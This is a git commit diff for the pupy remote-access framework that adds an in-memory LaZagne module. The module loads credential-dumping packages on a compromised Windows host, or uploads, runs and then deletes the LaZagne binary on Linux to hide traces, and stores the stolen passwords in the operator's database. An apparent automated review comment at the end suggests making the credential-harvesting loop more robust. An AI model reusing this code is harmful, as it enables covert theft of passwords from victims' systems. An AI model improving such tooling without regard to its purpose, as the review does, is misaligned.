In-memory LaZagne module from AlessandroZ

This commit is contained in:
n1nj4sec 2016-08-24 19:30:02 +02:00
parent d00ed46a91
commit f0e60a7606
3 changed files with 89 additions and 37 deletions

4
.gitmodules vendored

@ -10,3 +10,7 @@
path = pupy/external/LaZagne path = pupy/external/LaZagne
url = https://github.com/AlessandroZ/LaZagne url = https://github.com/AlessandroZ/LaZagne
shallow = true shallow = true
[submodule "pupy/external/impacket"]
path = pupy/external/impacket
url = https://github.com/CoreSecurity/impacket
shallow = true

1
pupy/external/impacket vendored Submodule

@ -0,0 +1 @@
Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340


@ -1,4 +1,6 @@
# -*- coding: UTF8 -*- # -*- coding: UTF8 -*-
# Author: AlessandroZ
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.PupyCompleter import * from pupylib.PupyCompleter import *
from rpyc.utils.classic import upload from rpyc.utils.classic import upload
@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials
import tempfile import tempfile
import subprocess import subprocess
import os.path import os.path
from pupylib.utils.rpyc_utils import redirected_stdo
__class_name__="LaZagne" __class_name__="LaZagne"
@ -16,56 +19,100 @@ class LaZagne(PupyModule):
""" """
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
self.arg_parser.add_argument("-v", "--verbose", action='store_true')
def run(self, args): def run(self, args):
platform=self.client.desc["platform"] platform=self.client.desc["platform"]
isWindows = True
if "Windows" in platform: if "Windows" in platform:
lazagne_path = self.client.pupsrv.config.get("lazagne","win") if "64" in self.client.desc["proc_arch"]:
self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'')
return
# load all dependency
self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll")))
self.client.load_package("sqlite3")
self.client.load_package("_sqlite3")
self.client.load_package("xml")
self.client.load_package("_elementtree")
self.client.load_package("pyexpat") # needed for _elementtree module
self.client.load_package("win32crypt")
self.client.load_package("win32api")
self.client.load_package("win32con")
self.client.load_package("win32cred")
self.client.load_package("colorama")
self.client.load_package("impacket")
self.client.load_package("calendar")
self.client.load_package("win32security")
self.client.load_package("win32net")
self.client.load_package("lazagne")
db = Credentials()
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
for module in moduleNames:
if args.verbose:
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
passwords = module.run(module.options['dest'].capitalize())
self.print_results(module.options['dest'].capitalize(), passwords, db)
elif "Linux" in platform: elif "Linux" in platform:
isWindows = False isWindows = False
if "64" in self.client.desc["os_arch"]: if "64" in self.client.desc["os_arch"]:
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64") lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
else: else:
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32") lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
else:
self.error("Platform not supported") if not os.path.isfile(lazagne_path):
return self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
return
tf = tempfile.NamedTemporaryFile()
dst = tf.name
tf.file.close()
if not os.path.isfile(lazagne_path): self.success("Uploading laZagne to: %s" % dst)
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) upload(self.client.conn, lazagne_path, dst)
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
return
tf = tempfile.NamedTemporaryFile()
dst = tf.name
if isWindows:
remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
tfName = tf.name.split(os.sep)
tfName = tfName[len(tfName)-1] + '.exe'
dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName)
tf.file.close()
self.success("Uploading laZagne to: %s" % dst)
upload(self.client.conn, lazagne_path, dst)
if not isWindows:
self.success("Adding execution permission") self.success("Adding execution permission")
cmd = ["chmod", "+x", dst] cmd = ["chmod", "+x", dst]
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
self.success("Executing") self.success("Executing")
cmd = [dst, "all"] cmd = [dst, "all"]
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
self.success("%s" % output) self.success("%s" % output)
creds = self.parse_output(output) creds = self.parse_output(output)
db = Credentials() db = Credentials()
db.add(creds) db.add(creds)
self.success("Passwords stored on the database") self.success("Passwords stored on the database")
self.success("Cleaning traces") self.success("Cleaning traces")
self.client.conn.modules['os'].remove(dst) self.client.conn.modules['os'].remove(dst)
else:
self.error("Platform not supported")
return
def print_results(self, module, creds, db):
if creds:
print "\n############## %s passwords ##############\n" % module
clean_creds = []
for cred in creds:
clean_cred = {}
clean_cred['Tool'] = 'Lazagne'
for c in cred.keys():
clean_cred[c] = cred[c].encode('utf-8')
print "%s: %s" % (c, cred[c])
print
clean_creds.append(clean_cred)
try:
db.add(clean_creds)
self.success("Passwords stored on the database")
except Exception, e:
print e
def parse_output(self, output): def parse_output(self, output):
creds = [] creds = []
@ -110,5 +157,5 @@ class LaZagne(PupyModule):
key, value = line.split(':', 1) key, value = line.split(':', 1)
cred[key] = value.strip() cred[key] = value.strip()
except: except:
pass pass
return creds return creds
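Review bot: The per-module loop in run's Windows branch (`for module in moduleNames:`) has no error isolation, so an exception raised by one LaZagne module's `module.run(...)` propagates out of run and the remaining modules are never executed; wrapping the call as `try: passwords = module.run(module.options['dest'].capitalize())` / `except Exception as e: self.error("module %s failed: %s" % (module.__class__.__name__, e)); continue` keeps the run going and reports the failure through the module's own output channel. The same channel point applies to print_results, where the `print` statements and `except Exception, e: print e` write to the server's stdout instead of `self.success`/`self.error`, so a failed `db.add` is easy to miss; `self.error("could not store credentials: %s" % e)` would match the rest of the file. `clean_cred[c] = cred[c].encode('utf-8')` also presumes every value is a text string — presumably true for LaZagne's output, but a non-string value would raise AttributeError there. The newly imported `redirected_stdo` is not referenced in any visible hunk and may be unused. `class LaZagne` begins outside this hunk.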